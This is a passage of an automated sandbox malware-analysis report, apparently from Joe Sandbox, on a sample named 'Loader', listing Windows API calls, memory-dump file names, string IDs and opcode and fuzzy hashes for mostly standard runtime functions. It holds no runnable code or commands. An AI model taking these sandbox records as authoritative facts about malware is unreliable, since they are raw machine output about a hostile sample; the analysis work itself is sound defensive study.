                                                                                              • FreeLibrary.KERNEL32(00000000,?,00E69EE2,00E641E0,?,00000000,?,?,?,00E69BEB,00000022,FlsSetValue,00E73DDC,00E73DE4,?), ref: 00E69E94
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: api-ms-$ext-ms-
                                                                                              • API String ID: 3664257935-537541572
                                                                                              • Opcode ID: 57e128ee5b7dcd990c9153f98a6cd99a081d52cf77e27c5918d30c5a6d21e380
                                                                                              • Instruction ID: 3817fd8cbcf287283d7c8c41830ce9fb65a4bc51142c785279cfe11eb54ad8fb
                                                                                              • Opcode Fuzzy Hash: 57e128ee5b7dcd990c9153f98a6cd99a081d52cf77e27c5918d30c5a6d21e380
                                                                                              • Instruction Fuzzy Hash: 4221F632A80210ABD721D761BC44B5A779CEF517F4F251120E91AB7293E732ED05C6D0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: a5d1abd880d748bb794f80472f98bdf7491d66b64f6368d3ab086ba2c7cc234c
                                                                                              • Instruction ID: 94a4561da6a39d916d572393f0ffe9d0e6d070f86d706900331692e78ebe245c
                                                                                              • Opcode Fuzzy Hash: a5d1abd880d748bb794f80472f98bdf7491d66b64f6368d3ab086ba2c7cc234c
                                                                                              • Instruction Fuzzy Hash: CD7139B4A05209DFCB04DFACD9686AEBBF0EF48701F209919E856BB351D73499488F51
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00E68831,00E65F0D,00E655A4), ref: 00E68848
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E68856
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E6886F
                                                                                              • SetLastError.KERNEL32(00000000,00E68831,00E65F0D,00E655A4), ref: 00E688C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 6b37904e011b6059d02469659ca425189f066a33266e9770ee76c75732e60b93
                                                                                              • Instruction ID: 2a451d83daf1ea92f4f26b9822dd74ab75a254383ee6855df9ceadb34dda7cd6
                                                                                              • Opcode Fuzzy Hash: 6b37904e011b6059d02469659ca425189f066a33266e9770ee76c75732e60b93
                                                                                              • Instruction Fuzzy Hash: C3014C3228C2125DE7286BB67D86A5A27D4FF127F83E01339F114B61F1EF114C455340
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00E725EB,000000FF,?,00E67015,?,?,00E670B1,00000000), ref: 00E66F89
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E66F9B
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00E725EB,000000FF,?,00E67015,?,?,00E670B1,00000000), ref: 00E66FBD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 7c9f8e19e6661ca2bc2ce16aaf2b2179a6d3aa93e809309b274db3e33691b1c7
                                                                                              • Instruction ID: f27dba54bde04a3916b141e1ab27cb5390018d208237e90d1db9b310e0f49425
                                                                                              • Opcode Fuzzy Hash: 7c9f8e19e6661ca2bc2ce16aaf2b2179a6d3aa93e809309b274db3e33691b1c7
                                                                                              • Instruction Fuzzy Hash: 3201D631A54619AFCB11CF51EC09FAEB7B8FB04B55F044525F825F2390DB749944CA90
                                                                                              APIs
                                                                                              • __alloca_probe_16.LIBCMT ref: 00E6DFA2
                                                                                              • __alloca_probe_16.LIBCMT ref: 00E6E06B
                                                                                              • __freea.LIBCMT ref: 00E6E0D2
                                                                                                • Part of subcall function 00E6BC45: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E641E0,?,?,00E61007,?,00E5FAB5), ref: 00E6BC77
                                                                                              • __freea.LIBCMT ref: 00E6E0E5
                                                                                              • __freea.LIBCMT ref: 00E6E0F2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1096550386-0
                                                                                              • Opcode ID: 2cf6fa317591be3d2345e0433a7d567dc4cf177325c599a6378a9461043940cf
                                                                                              • Instruction ID: 63b041d30eb0d2d7179d078ab64fa2cb3c3d85f7fe6e0c147ae2417b0b727fae
                                                                                              • Opcode Fuzzy Hash: 2cf6fa317591be3d2345e0433a7d567dc4cf177325c599a6378a9461043940cf
                                                                                              • Instruction Fuzzy Hash: 3051E476680206AFDF215F60EC41EBB76ADEF44794F255029FD14F6282EBB1DC50C660
                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00E693FE,?,?,00000000,00000000,00000000,?), ref: 00E6951D
                                                                                              • CatchIt.LIBVCRUNTIME ref: 00E69603
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: CatchEncodePointer
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 1435073870-2084237596
                                                                                              • Opcode ID: 1c7f39e1b2a0e01d355640c01504e1505ab8c95acba0aea5fe52934b56d2ff3d
                                                                                              • Instruction ID: a8bc74c1fc24edfba93a0280380b7c337c03fd567a6152ccf727d15b2da1b325
                                                                                              • Opcode Fuzzy Hash: 1c7f39e1b2a0e01d355640c01504e1505ab8c95acba0aea5fe52934b56d2ff3d
                                                                                              • Instruction Fuzzy Hash: CE418A72940209AFCF16CF94ED81AEE7BB9FF48344F189099F905B7222D7359950CB50
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00E6DCFA,00000000,?,00E7CCD0,?,?,?,00E6DC31,00000004,InitializeCriticalSectionEx,00E746F8,00E74700), ref: 00E6DC6B
                                                                                              • GetLastError.KERNEL32(?,00E6DCFA,00000000,?,00E7CCD0,?,?,?,00E6DC31,00000004,InitializeCriticalSectionEx,00E746F8,00E74700,00000000,?,00E6971C), ref: 00E6DC75
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00E6DC9D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3177248105-2084034818
                                                                                              • Opcode ID: eb560adc2025fb78eb900df3916e1dd11b35dff462c1e91cd982281eee02698e
                                                                                              • Instruction ID: 4aa6975075219598b219b26dcf495685328b1f58d9f81f5a145f5026410c0828
                                                                                              • Opcode Fuzzy Hash: eb560adc2025fb78eb900df3916e1dd11b35dff462c1e91cd982281eee02698e
                                                                                              • Instruction Fuzzy Hash: 12E048307C4209BFEF206B62FD4AB587F69AF10B94F545020F90DF80E1FBA29955D544
                                                                                              APIs
                                                                                              • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00E6E64B
                                                                                                • Part of subcall function 00E6D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,00E687B1,?,00000000,?), ref: 00E6D192
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E6E89D
                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00E6E8E3
                                                                                              • GetLastError.KERNEL32 ref: 00E6E986
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                              • String ID:
                                                                                              • API String ID: 2112829910-0
                                                                                              • Opcode ID: bce82268ca1c78cf70e2e8fb9a11f2f9ab95ede7ee5ad996d6ae27d31a225c8a
                                                                                              • Instruction ID: 1c7cbf8ba6e8b0b76ff17156af272e14939378c722a6ade1f7373c9e0e3af098
                                                                                              • Opcode Fuzzy Hash: bce82268ca1c78cf70e2e8fb9a11f2f9ab95ede7ee5ad996d6ae27d31a225c8a
                                                                                              • Instruction Fuzzy Hash: 90D18979D002489FCB15CFA8E8809EDBBF9EF48354F28456AE456FB391D730A946CB50
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer
                                                                                              • String ID:
                                                                                              • API String ID: 1740715915-0
                                                                                              • Opcode ID: 329028dafe53bbab2474ea524b4e162603139261b04e2dafaa15e1f3b83263ab
                                                                                              • Instruction ID: 7b962daae82f24dbeb877bcc17f76949adea877fdfd5607d56a5f246959cb164
                                                                                              • Opcode Fuzzy Hash: 329028dafe53bbab2474ea524b4e162603139261b04e2dafaa15e1f3b83263ab
                                                                                              • Instruction Fuzzy Hash: C351F672685606AFDB288F14F941BBA73E9FF50384F14511DE945BB192DB32EC40C790
                                                                                              APIs
                                                                                                • Part of subcall function 00E6D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,00E687B1,?,00000000,?), ref: 00E6D192
                                                                                              • GetLastError.KERNEL32 ref: 00E6C61C
                                                                                              • __dosmaperr.LIBCMT ref: 00E6C623
                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 00E6C65D
                                                                                              • __dosmaperr.LIBCMT ref: 00E6C664
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1913693674-0
                                                                                              • Opcode ID: 41475a0f68f603750796b9f33a27c1d667359f12a1c2ce8dbb0ff532e06be0a6
                                                                                              • Instruction ID: 5a8669a689152a7f7e47938d97c3994315055bd2d3a4444a421aa5a55edcb462
                                                                                              • Opcode Fuzzy Hash: 41475a0f68f603750796b9f33a27c1d667359f12a1c2ce8dbb0ff532e06be0a6
                                                                                              • Instruction Fuzzy Hash: 5521B671680205AF9B109F65EC8097E7BE9EF453E8720B519F8AAF7111D730EC818BA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c0c3def469129952099306e5a4c3537064ff9ca9c63873a60108462662855cd2
                                                                                              • Instruction ID: 4058ff9612a395a2f14f46bbd0294b10dc0764c1ccdab50530acbe0192bb68a3
                                                                                              • Opcode Fuzzy Hash: c0c3def469129952099306e5a4c3537064ff9ca9c63873a60108462662855cd2
                                                                                              • Instruction Fuzzy Hash: 5721C271280205AFCB20AF65BC95C7AB7A9AF413E87205925F8ADF7551DB30EC80D790
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00E6D235
                                                                                                • Part of subcall function 00E6D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,00E687B1,?,00000000,?), ref: 00E6D192
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E6D26D
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E6D28D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 158306478-0
                                                                                              • Opcode ID: 77267874bf5bddcc75fc6c60a17745fc18c3bde5f6fbbacf7c5c4dd4efcfb1e1
                                                                                              • Instruction ID: ddf7f4fd98553e0fbde6e487ada63dec0ba3f75623f48cee6e3d4be4a0e9fc8a
                                                                                              • Opcode Fuzzy Hash: 77267874bf5bddcc75fc6c60a17745fc18c3bde5f6fbbacf7c5c4dd4efcfb1e1
                                                                                              • Instruction Fuzzy Hash: 3911C4B1F495197E672167767CC9CAF6DACDF953E8B901014F805F2112FB60CD4241B0
                                                                                              APIs
                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00E6FF31,00000000,00000001,00000000,?,?,00E6E9DA,?,00000000,00000000), ref: 00E707D7
                                                                                              • GetLastError.KERNEL32(?,00E6FF31,00000000,00000001,00000000,?,?,00E6E9DA,?,00000000,00000000,?,?,?,00E6E320,00000000), ref: 00E707E3
                                                                                                • Part of subcall function 00E70840: CloseHandle.KERNEL32(FFFFFFFE,00E707F3,?,00E6FF31,00000000,00000001,00000000,?,?,00E6E9DA,?,00000000,00000000,?,?), ref: 00E70850
                                                                                              • ___initconout.LIBCMT ref: 00E707F3
                                                                                                • Part of subcall function 00E70815: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00E707B1,00E6FF1E,?,?,00E6E9DA,?,00000000,00000000,?), ref: 00E70828
                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00E6FF31,00000000,00000001,00000000,?,?,00E6E9DA,?,00000000,00000000,?), ref: 00E70808
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                              • String ID:
                                                                                              • API String ID: 2744216297-0
                                                                                              • Opcode ID: 0185329ddabf46b137ee339476bb9cc5c126e154bb4d7fd9b30a56b57c6ca550
                                                                                              • Instruction ID: 001de7e67074ba9b4e630857ef9044f2d5b8b04a1b22bb2549eec8d9e66672bf
                                                                                              • Opcode Fuzzy Hash: 0185329ddabf46b137ee339476bb9cc5c126e154bb4d7fd9b30a56b57c6ca550
                                                                                              • Instruction Fuzzy Hash: C3F0F836000159FFCF225F969C08A8A3E66FF083A1F009425FA2CA5122D67288659B91
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: />;1$;;50
                                                                                              • API String ID: 3664257935-4059640636
                                                                                              • Opcode ID: 0ab95ecbee1dd8dfb8dd5c3050596fd92f6c002df127343a4e3c3c90e1871764
                                                                                              • Instruction ID: 172fcc1aa8a236afcdca7ad852102e95021fad56fecfcaf6763043d0427a5d3e
                                                                                              • Opcode Fuzzy Hash: 0ab95ecbee1dd8dfb8dd5c3050596fd92f6c002df127343a4e3c3c90e1871764
                                                                                              • Instruction Fuzzy Hash: C2A15671704B518BD7258B25C841BA3FBE2AB92314F588A3ED4EB4B3C2C739A40AC755
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E649EA
                                                                                              • ___raise_securityfailure.LIBCMT ref: 00E64AD2
                                                                                                • Part of subcall function 00E659FC: RaiseException.KERNEL32(E06D7363,00000001,00000003,00E649DE,BB40E64E,?,?,?,00E649DE,?,00E79B2C), ref: 00E65A5C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFeaturePresentProcessorRaise___raise_securityfailure
                                                                                              • String ID: %
                                                                                              • API String ID: 3749517692-3997664075
                                                                                              • Opcode ID: 8b3f285b0230214996e1c52c926e85150eed1c8476de28c6c2bc0142fa42bd15
                                                                                              • Instruction ID: 844749ede6264895e59b66d2c884cbc6ae25824b68b57d34f36ceb7501ed54d9
                                                                                              • Opcode Fuzzy Hash: 8b3f285b0230214996e1c52c926e85150eed1c8476de28c6c2bc0142fa42bd15
                                                                                              • Instruction Fuzzy Hash: 1A318BB5540304AFC700DF66F846A587BECBB08354F20612EEA1CFA2E1E771A9C8CB40
                                                                                              APIs
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00E68D75
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882725763.0000000000E7B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882748311.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882769529.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___except_validate_context_record
                                                                                              • String ID: csm$csm
                                                                                              • API String ID: 3493665558-3733052814
                                                                                              • Opcode ID: f69caa62f47b4ba9f9e273ac1a5cab86748e343e8b62afa8859ee651345feba2
                                                                                              • Instruction ID: 1c728529fce3381b0ae4f94497d0c16df279b53e1278a5a2a34c0f4ae8cbb651
                                                                                              • Opcode Fuzzy Hash: f69caa62f47b4ba9f9e273ac1a5cab86748e343e8b62afa8859ee651345feba2
                                                                                              • Instruction Fuzzy Hash: 24313C76480215EFCF264F50EE048AA7B66FF18398B18675AF94439121CB33DDA1DB91
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E649EA
                                                                                              • ___raise_securityfailure.LIBCMT ref: 00E64AD2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882637788.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1882616686.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1882685226.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
